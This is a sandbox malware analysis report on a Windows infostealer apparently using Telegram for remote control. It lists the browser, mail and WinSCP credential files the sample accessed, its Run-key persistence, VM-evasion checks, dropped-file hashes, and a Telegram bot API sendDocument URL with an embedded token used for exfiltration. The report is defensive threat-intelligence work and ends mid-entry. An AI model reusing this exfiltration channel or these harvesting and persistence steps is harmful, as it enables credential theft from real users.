              Source: C:\Users\user\Desktop\izwFjkhFJm.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
              Source: Yara match | File source: 0000000F.00000002.530484456.0000000003248000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: Process Memory Space: izwFjkhFJm.exe PID: 2948, type: MEMORYSTR

              Remote Access Functionality

              Source: Yara match | File source: Process Memory Space: izwFjkhFJm.exe PID: 2948, type: MEMORYSTR
              Source: Yara match | File source: Process Memory Space: Oefdyik.exe PID: 6036, type: MEMORYSTR
              Source: Yara match | File source: 0000001B.00000002.534154582.0000000002F7F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: 0000000F.00000002.530484456.0000000003248000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match | File source: Process Memory Space: izwFjkhFJm.exe PID: 2948, type: MEMORYSTR
              Source: Yara match | File source: Process Memory Space: Oefdyik.exe PID: 6036, type: MEMORYSTR
              MITRE ATT&CK Matrix (numbers preceding a technique are the report's hit counts; empty cells have no entry)

              Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
              Valid Accounts | 211 Windows Management Instrumentation | 11 Registry Run Keys / Startup Folder | 112 Process Injection | 1 Disable or Modify Tools | 1 OS Credential Dumping | 1 Account Discovery | Remote Services | 1 Archive Collected Data | Exfiltration Over Other Network Medium | 1 Web Service | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
              Default Accounts | 1 PowerShell | Boot or Logon Initialization Scripts | 11 Registry Run Keys / Startup Folder | 1 Deobfuscate/Decode Files or Information | 21 Input Capture | 1 File and Directory Discovery | Remote Desktop Protocol | 1 Data from Local System | Exfiltration Over Bluetooth | 1 Ingress Tool Transfer | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
              Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | 1 Obfuscated Files or Information | 1 Credentials in Registry | 114 System Information Discovery | SMB/Windows Admin Shares | 1 Email Collection | Automated Exfiltration | 11 Encrypted Channel | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
              Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | 1 Masquerading | NTDS | 211 Security Software Discovery | Distributed Component Object Model | 21 Input Capture | Scheduled Transfer | 3 Non-Application Layer Protocol | SIM Card Swap |  | Carrier Billing Fraud
              Cloud Accounts | Cron | Network Logon Script | Network Logon Script | 131 Virtualization/Sandbox Evasion | LSA Secrets | 2 Process Discovery | SSH | 1 Clipboard Data | Data Transfer Size Limits | 14 Application Layer Protocol | Manipulate Device Communication |  | Manipulate App Store Rankings or Ratings
              Replication Through Removable Media | Launchd | Rc.common | Rc.common | 112 Process Injection | Cached Domain Credentials | 131 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service |  | Abuse Accessibility Features
              External Remote Services | Scheduled Task | Startup Items | Startup Items | 1 Hidden Files and Directories | DCSync | 1 Application Window Discovery | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points |  | Data Encrypted for Impact
              Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | 1 System Owner/User Discovery | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols |  | Generate Fraudulent Advertising Revenue
              Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Masquerading | /etc/passwd and /etc/shadow | 1 Remote System Discovery | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station |  | Data Destruction
              Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | Invalid Code Signature | Network Sniffing | 1 System Network Configuration Discovery | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols |  |  | Data Encrypted for Impact

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
Behavior Graph (ID: 830846; sample: izwFjkhFJm.exe; start date: 20/03/2023; architecture: WINDOWS; score: 100)

Start [node 2]
  DNS/IP: api4.ipify.org; api.telegram.org; api.ipify.org
  Signatures: Snort IDS alert for network traffic; Multi AV Scanner detection for submitted file; Yara detected Telegram RAT; 5 other signatures
  started:
    izwFjkhFJm.exe [node 8] (graph counters: 1 8)
      dropped: C:\Users\user\AppData\Roaming\...\Oefdyik.exe (PE32); C:\Users\user\...\Oefdyik.exe:Zone.Identifier (ASCII); C:\Users\user\AppData\...\izwFjkhFJm.exe.log (ASCII)
      Signatures: Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); May check the online IP address of the machine; Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines); 3 other signatures
      started:
        izwFjkhFJm.exe [node 18] (graph counters: 17 5)
          DNS/IP: api4.ipify.org 173.231.16.76, 443, 49699, 49702 WEBNXUS United States; api.telegram.org 149.154.167.220, 443, 49701, 49715 TELEGRAMRU United Kingdom; api.ipify.org
          dropped: C:\Users\user\AppData\Roaming\...\kDPmkTm.exe (PE32); C:\Users\user\...\kDPmkTm.exe:Zone.Identifier (ASCII)
          Signatures: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Tries to steal Mail credentials (via file / registry access); Creates multiple autostart registry keys
        powershell.exe [node 23] (graph counters: 16)
          started: conhost.exe [node 39]
        izwFjkhFJm.exe [node 25]
        2 other processes [node 37]
    Oefdyik.exe [node 12] (graph counters: 4)
      Signatures: Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; Encrypted powershell cmdline option found
      started:
        Oefdyik.exe [node 27]
          DNS/IP: api.ipify.org
          Signatures: Tries to harvest and steal browser information (history, passwords, etc); Hides that the sample has been downloaded from the Internet (zone.identifier); Installs a global keyboard hook
        powershell.exe [node 29]
          started: conhost.exe [node 41]
        Oefdyik.exe [node 31]
    kDPmkTm.exe [node 14] (graph counters: 3)
      started: powershell.exe [node 33]
        started: conhost.exe [node 43]
    2 other processes [node 16]
      started: powershell.exe [node 35]
        started: conhost.exe [node 45]

Initial Sample:

Source         | Detection | Scanner        | Label                        | Link
izwFjkhFJm.exe | 33%       | ReversingLabs  | ByteCode-MSIL.Packed.Generic |
izwFjkhFJm.exe | 53%       | Virustotal     |                              | Browse
izwFjkhFJm.exe | 100%      | Joe Sandbox ML |                              |

Dropped Files:

Source                                            | Detection | Scanner        | Label                        | Link
C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe | 100%      | Joe Sandbox ML |                              |
C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe | 100%      | Joe Sandbox ML |                              |
C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe | 53%       | Virustotal     |                              | Browse
C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe | 33%       | ReversingLabs  | ByteCode-MSIL.Packed.Generic |
C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe | 33%       | ReversingLabs  | ByteCode-MSIL.Packed.Generic |

Unpacked PE Files:

Source                            | Detection | Scanner | Label             | Link | Download
27.2.Oefdyik.exe.400000.0.unpack  | 100%      | Avira   | HEUR/AGEN.1215472 |      | Download File

Domains:

No Antivirus matches

URLs:

Source                                    | Detection | Scanner        | Label | Link
https://api.telegram.org4                 | 0%        | URL Reputation | safe  |
https://urn.to/r/sds_see                  | 0%        | URL Reputation | safe  |
http://james.newtonking.com/projects/json | 0%        | URL Reputation | safe  |
Contacted Domains:

Name             | IP              | Active  | Malicious | Antivirus Detection | Reputation
api4.ipify.org   | 173.231.16.76   | true    | false     | -                   | high
api.telegram.org | 149.154.167.220 | true    | false     | -                   | high
api.ipify.org    | unknown         | unknown | false     | -                   | high

Contacted URLs:

Name                                                                                   | Malicious | Antivirus Detection | Reputation
https://api.ipify.org/                                                                 | false     | -                   | high
https://api.telegram.org/bot5687731944:AAEDpsUftmaHrKNSGkOlhq0UZLPEvIUd8Bo/sendDocument | false     | -                   | high

URLs from Memory and Binaries:

Name | Source | Malicious | Antivirus Detection | Reputation
https://api.ipify.org | izwFjkhFJm.exe, 0000000F.00000002.530484456.0000000003211000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 0000001B.00000002.534154582.0000000002F31000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://api.telegram.org4 | izwFjkhFJm.exe, 0000000F.00000002.530484456.0000000003266000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://api.telegram.org | izwFjkhFJm.exe, 0000000F.00000002.530484456.0000000003266000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://www.newtonsoft.com/jsonschema | kDPmkTm.exe, 00000015.00000002.536382964.00000000047F9000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://www.newtonsoft.com/json | kDPmkTm.exe, 00000011.00000002.526973969.000000000301F000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000015.00000002.536382964.000000000489C000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000015.00000002.536382964.00000000047FC000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://www.nuget.org/packages/Newtonsoft.Json.Bson | izwFjkhFJm.exe, 00000000.00000002.338193275.0000000005CA0000.00000004.08000000.00040000.00000000.sdmp, izwFjkhFJm.exe, 00000000.00000002.331982609.000000000292A000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 00000010.00000002.478092419.000000000330A000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.552309880.00000000046D9000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.526973969.000000000301F000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000015.00000002.536382964.00000000047F9000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://api.telegram.org/bot5687731944:AAEDpsUftmaHrKNSGkOlhq0UZLPEvIUd8Bo/ | izwFjkhFJm.exe, 0000000F.00000002.530484456.0000000003211000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 0000001B.00000002.534154582.0000000002F31000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://urn.to/r/sds_see | izwFjkhFJm.exe, 00000000.00000002.336146048.0000000005440000.00000004.08000000.00040000.00000000.sdmp, Oefdyik.exe, 00000010.00000003.350241143.000000000472E000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://api.telegram.org | izwFjkhFJm.exe, 0000000F.00000002.530484456.0000000003266000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | izwFjkhFJm.exe, 0000000F.00000002.530484456.0000000003211000.00000004.00000800.00020000.00000000.sdmp, Oefdyik.exe, 0000001B.00000002.534154582.0000000002F31000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://james.newtonking.com/projects/json | Oefdyik.exe, 00000010.00000002.478092419.000000000330A000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.552309880.00000000046D5000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.552309880.000000000462D000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000011.00000002.526973969.000000000301F000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000015.00000002.536382964.00000000047F5000.00000004.00000800.00020000.00000000.sdmp, kDPmkTm.exe, 00000015.00000002.536382964.000000000488D000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown

Legend (IP map):

• No. of IPs < 25%
• 25% < No. of IPs < 50%
• 50% < No. of IPs < 75%
• 75% < No. of IPs

Contacted IPs:

IP              | Domain           | Country        | ASN   | ASN Name   | Malicious
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | false
173.231.16.76   | api4.ipify.org   | United States  | 18450 | WEBNXUS    | false
                                        Joe Sandbox Version:37.0.0 Beryl
                                        Analysis ID:830846
                                        Start date and time:2023-03-20 18:29:52 +01:00
                                        Joe Sandbox Product:CloudBasic
                                        Overall analysis duration:0h 12m 52s
                                        Hypervisor based Inspection enabled:false
                                        Report type:light
                                        Cookbook file name:default.jbs
                                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed:30
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:0
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • HDC enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Sample file name:izwFjkhFJm.exe
                                        Original Sample Name:ae2a3b41292c66a9dd6f10c874c05293.exe
                                        Detection:MAL
                                        Classification:mal100.troj.spyw.evad.winEXE@29/16@8/2
                                        EGA Information:
                                        • Successful, ratio: 100%
                                        HDC Information:Failed
                                        HCA Information:
                                        • Successful, ratio: 99%
                                        • Number of executed functions: 0
                                        • Number of non-executed functions: 0
                                        Cookbook Comments:
                                        • Found application associated with file extension: .exe
                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                        • Excluded IPs from analysis (whitelisted): 40.126.32.137, 20.190.160.13, 40.126.32.69, 40.126.32.132, 20.190.160.15, 20.190.160.23, 40.126.32.67, 20.190.160.21, 13.89.179.12
                                        • Excluded domains from analysis (whitelisted): prdv6a.aadg.msidentity.com, fs.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, www.tm.v6.a.prd.aadg.trafficmanager.net, ctldl.windowsupdate.com, watson.telemetry.microsoft.com, onedsblobprdcus17.centralus.cloudapp.azure.com, login.msa.msidentity.com, www.tm.lg.prod.aadmsa.trafficmanager.net
                                        • Not all processes where analyzed, report is missing behavior information
                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                        • Report size getting too big, too many NtQueryValueKey calls found.
Time     | Type            | Description
18:30:59 | API Interceptor | 90x Sleep call for process: powershell.exe modified
18:31:25 | Autostart       | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Oefdyik "C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe"
18:31:31 | API Interceptor | 590x Sleep call for process: izwFjkhFJm.exe modified
18:31:33 | Autostart       | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run kDPmkTm C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe
18:31:44 | Autostart       | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Oefdyik "C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe"
18:31:53 | Autostart       | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run kDPmkTm C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe
18:32:48 | API Interceptor | 17x Sleep call for process: Oefdyik.exe modified
                                        Process:C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):1459
                                        Entropy (8bit):5.3420905847574325
                                        Encrypted:false
                                        SSDEEP:24:MLsmE4K5E4Ks2wKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FayE4bE4KKE4KdEW:M4mHK5HKXwYHKhQnoPtHoxHhAHKzvFah
                                        MD5:FB4B7720101F874710FF986326F7980F
                                        SHA1:48F55B9470DB8CB42CF39FF5C8F5D6AAFB1BBD48
                                        SHA-256:94EF05B91B3B8D4F88102C7CEB77D5CAE9003A9534205ED0A15A5A227954D10D
                                        SHA-512:B08E09C4E5ADE86B5D0F9274FD1732F958DFAAA8F453BE55435B7504F4A51987180D13A5C35C759A27AE1000B8A624AE06CC2641A08A6C259C7F6C05B8F07D31
                                        Malicious:false
                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Transactions, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0..2,"System.EnterpriseServices, Version=4.0.0.0, Culture=neut
                                        Process:C:\Users\user\Desktop\izwFjkhFJm.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:modified
                                        Size (bytes):1459
                                        Entropy (8bit):5.3420905847574325
                                        Encrypted:false
                                        SSDEEP:24:MLsmE4K5E4Ks2wKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FayE4bE4KKE4KdEW:M4mHK5HKXwYHKhQnoPtHoxHhAHKzvFah
                                        MD5:FB4B7720101F874710FF986326F7980F
                                        SHA1:48F55B9470DB8CB42CF39FF5C8F5D6AAFB1BBD48
                                        SHA-256:94EF05B91B3B8D4F88102C7CEB77D5CAE9003A9534205ED0A15A5A227954D10D
                                        SHA-512:B08E09C4E5ADE86B5D0F9274FD1732F958DFAAA8F453BE55435B7504F4A51987180D13A5C35C759A27AE1000B8A624AE06CC2641A08A6C259C7F6C05B8F07D31
                                        Malicious:true
                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Transactions, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0..2,"System.EnterpriseServices, Version=4.0.0.0, Culture=neut
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):5829
                                        Entropy (8bit):4.8968676994158
                                        Encrypted:false
                                        SSDEEP:96:WCJ2Woe5o2k6Lm5emmXIGvgyg12jDs+un/iQLEYFjDaeWJ6KGcmXx9smyFRLcU6f:5xoe5oVsm5emd0gkjDt4iWN3yBGHh9s6
                                        MD5:36DE9155D6C265A1DE62A448F3B5B66E
                                        SHA1:02D21946CBDD01860A0DE38D7EEC6CDE3A964FC3
                                        SHA-256:8BA38D55AA8F1E4F959E7223FDF653ABB9BE5B8B5DE9D116604E1ABB371C1C87
                                        SHA-512:C734ADE161FB89472B1DF9B9F062F4A53E7010D3FF99EDC0BD564540A56BC35743625C50A00635C31D165A74DCDBB330FFB878C5919D7B267F6F33D2AAB328E7
                                        Malicious:false
                                        Preview:PSMODULECACHE......<.e...Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........<.e...T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):15672
                                        Entropy (8bit):5.542414046296337
                                        Encrypted:false
                                        SSDEEP:384:nte/AM1oA1uPqtIosSjn+ilr3bsFvMs48LP:OrAqtyo+ilrIRpP
                                        MD5:8AEBA6925AFDFB54DA529AC11C28736E
                                        SHA1:05C4C8EE5B22C660A33DCFFC4F0E35900AF7BC90
                                        SHA-256:14595BFD9842BA212582C416C1B2F4128E1AC203DB766B0F5359EB46BF1F6265
                                        SHA-512:3C1A1D0E2273E4E9DA27384EEE2CED1B22EEC63B102D4602903705C8D9EDA6BCF07053A2FCFE0007629EE641F4B93F2D9D06F276E06995C96529DECD51E02E5F
                                        Malicious:false
                                        Preview:@...e...........7.......$.....s.s...............................H...............<@.^.L."My...:'..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.............System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:very short file (no magic)
                                        Category:dropped
                                        Size (bytes):1
                                        Entropy (8bit):0.0
                                        Encrypted:false
                                        SSDEEP:3:U:U
                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                        Malicious:false
                                        Preview:1
Seven further dropped files from Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe carry metadata identical to the entry above (File Type: very short file (no magic); Category: dropped; Size (bytes): 1; Entropy (8bit): 0.0; MD5: C4CA4238A0B923820DCC509A6F75849B; SHA1: 356A192B7913B04C54574D18C28D46E6395428AB; Malicious: false; Preview: 1).
                                        Process:C:\Users\user\Desktop\izwFjkhFJm.exe
                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Category:dropped
                                        Size (bytes):1863168
                                        Entropy (8bit):5.309741607982687
                                        Encrypted:false
                                        SSDEEP:24576:MVlSKtu1Dze6HDpL1J4yMPdxjNbTCUeoTYoTVCo8HkZ3Y8j8W0kWiqMhX2HyQBEO:8NLZzslSQqY5TXKZhSlB
                                        MD5:AE2A3B41292C66A9DD6F10C874C05293
                                        SHA1:CAA30701C5487C2AECFB9B35B1D0E9EA6F3214B6
                                        SHA-256:65CC1EA27C733C270DD0497ED9C99896BAF50EEAFA5E1200889557985BFD87D5
                                        SHA-512:54606FCE1CE37CA0B4A25DD94ABC5CD47BE86A498204A0581DEF8A62F714EA101B817570A456FF7E054A4C8D3DE8F3D69A8CD823DFA87515C4690AE229BB6315
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                        • Antivirus: Virustotal, Detection: 53%
                                        • Antivirus: ReversingLabs, Detection: 33%
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...|..d.................H...$.......f... ........@.. ....................................`..................................f..W........!........................................................................... ............... ..H............text....F... ...H.................. ..`.rsrc....!......."...J..............@..@.reloc...............l..............@..B.................f......H.......DJ..T.......U...h1...............................................0...........(.....-.+.(!...+.*..0..........s.....-.&+......+.*..0..-.......(....,...s%....-.&+.(....+.*...-.&&+.(....+.*....0..0.......(....,....s?....-.&+.(....+.*....-.&&&+.(....+.*.0..#.......(....,..s3....-.&+.(....+.*.(....&*..0..*.......(....,..sV....-.&+.(....+.*..-.&+.(....+.*...0..,.......(....,..sJ....-.&+.(....+.*...-.&&+.(....+.*.0..-.......(....,...s6....-.&+.(....+.*...-.&&+.(....+.*....0..
                                        Process:C:\Users\user\Desktop\izwFjkhFJm.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):26
                                        Entropy (8bit):3.95006375643621
                                        Encrypted:false
                                        SSDEEP:3:ggPYV:rPYV
                                        MD5:187F488E27DB4AF347237FE461A079AD
                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                        Malicious:true
                                        Preview:[ZoneTransfer]....ZoneId=0
                                        Process:C:\Users\user\Desktop\izwFjkhFJm.exe
                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Category:dropped
                                        Size (bytes):1863168
                                        Entropy (8bit):5.309741607982687
                                        Encrypted:false
                                        SSDEEP:24576:MVlSKtu1Dze6HDpL1J4yMPdxjNbTCUeoTYoTVCo8HkZ3Y8j8W0kWiqMhX2HyQBEO:8NLZzslSQqY5TXKZhSlB
                                        MD5:AE2A3B41292C66A9DD6F10C874C05293
                                        SHA1:CAA30701C5487C2AECFB9B35B1D0E9EA6F3214B6
                                        SHA-256:65CC1EA27C733C270DD0497ED9C99896BAF50EEAFA5E1200889557985BFD87D5
                                        SHA-512:54606FCE1CE37CA0B4A25DD94ABC5CD47BE86A498204A0581DEF8A62F714EA101B817570A456FF7E054A4C8D3DE8F3D69A8CD823DFA87515C4690AE229BB6315
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                        • Antivirus: ReversingLabs, Detection: 33%
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...|..d.................H...$.......f... ........@.. ....................................`..................................f..W........!........................................................................... ............... ..H............text....F... ...H.................. ..`.rsrc....!......."...J..............@..@.reloc...............l..............@..B.................f......H.......DJ..T.......U...h1...............................................0...........(.....-.+.(!...+.*..0..........s.....-.&+......+.*..0..-.......(....,...s%....-.&+.(....+.*...-.&&+.(....+.*....0..0.......(....,....s?....-.&+.(....+.*....-.&&&+.(....+.*.0..#.......(....,..s3....-.&+.(....+.*.(....&*..0..*.......(....,..sV....-.&+.(....+.*..-.&+.(....+.*...0..,.......(....,..sJ....-.&+.(....+.*...-.&&+.(....+.*.0..-.......(....,...s6....-.&+.(....+.*...-.&&+.(....+.*....0..
                                        Process:C:\Users\user\Desktop\izwFjkhFJm.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:modified
                                        Size (bytes):26
                                        Entropy (8bit):3.95006375643621
                                        Encrypted:false
                                        SSDEEP:3:ggPYV:rPYV
                                        MD5:187F488E27DB4AF347237FE461A079AD
                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
